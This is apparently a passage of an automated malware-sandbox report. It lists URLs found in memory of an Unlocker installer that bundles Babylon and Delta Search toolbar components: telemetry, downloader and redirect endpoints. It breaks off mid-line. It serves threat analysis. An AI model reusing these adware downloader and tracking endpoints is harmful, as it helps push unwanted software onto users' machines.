Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360644771.0000000002387000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://info.babylon.com/stat/client_ga.php?name=$
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://info.babylon.com/welcome/
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://info.babylon.com/welcome/ER
Source: Unlocker1.9.2.exe, 00000000.00000003.324401251.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.323738721.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.338245646.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324831315.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.338510112.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.308680895.0000000002802000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324623938.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.308576308.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324810011.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324676511.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.323660650.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373598163.000000000019A000.00000004.00000010.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324650821.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324760209.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324786487.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.324593121.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.323709911.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.323362656.00000000028E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://info.delta-search.com/uninstall/eula.html
Source: Unlocker1.9.2.exe, 00000000.00000003.373205075.0000000000732000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.297608040.000000000280E000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373598163.000000000019A000.00000004.00000010.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000003.373387708.0000000000735000.00000004.00000020.00020000.00000000.sdmp, Unlocker1.9.2.exe, 00000000.00000002.373842768.0000000000736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://info.delta-search.com/uninstall/privacy.html
Source: Unlocker1.9.2.exe, uninst.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Unlocker1.9.2.exe, uninst.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://ocsp.thawte.com0
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://search.babylon.com
Source: Setup.exe, 00000002.00000002.358963994.000000000017D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://stat.info-strea
Source: Setup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.info-strea/downloader.php?ver=9.1.1.10&affilID=122471&guid=
Source: Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&s
Source: Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&sSW:
Source: Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=111&ver=9.1.1.10&af
Source: Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, log_file.txt.2.drString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&aff
Source: Setup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmp, log_file.txt.2.drString found in binary or memory: http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&af
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://stp.babylon.com/downloader.php?&lang=&zpb=1&second=1&geo=1about:blank:about:blankbfrNvgt:
Source: Setup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stp.babylon.com/downloader.php?ver=9.1.1.10&affilID=122471&guid=
Source: Setup.exeString found in binary or memory: http://stpui.babylon.com/
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://stpui.babylon.com/setup_cms_url?name=&param=&lang=%d&ver=%d&bld=%d&&ver=
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://tc.babylon.com/Ginger/correct
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tc.babylon.com/Ginger/correct1
Source: Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tcm.babylB
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://tcm.babylon.com/UM_Consumer/UMOpeartions
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://transurl.babylon.com
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr, Setup.exe.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Unlocker1.9.2.exe, 00000000.00000003.352261412.0000000005101000.00000004.00000020.00020000.00000000.sdmp, README.TXT.0.drString found in binary or memory: http://unlocker.emptyloop.com
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/)
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/????
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Accesso
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Acest
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Aquest
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Ce
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Denegado
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Denne
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Detta
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Dit
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Esta
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Este
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/GET
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Juurdep
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Ky
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Mesej
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Odm
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Ova
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/P
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Pesan
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Poruka
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Pr
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Questo
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/See
Source: Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/T
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Ta
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/Tato
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/This
Source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drString found in binary or memory: http://unlocker.emptyloop.com/To
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://utils.babylon.com/country/
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utils.babylon.com/country/S7
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/lingoz-redirect
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/client.cgi?
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/download.cgi?
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/purchase.cgi?
Source: Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/purchase.cgi??
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?
Source: Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?b
Source: Setup.exeString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?no_policy=1&type=%s&lang=%d
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?no_policy=1&type=%s&lang=%d9.1.1.10HPTBDSPukieffcrver=&&m
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360676354.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358228779.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358133429.000000000238C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 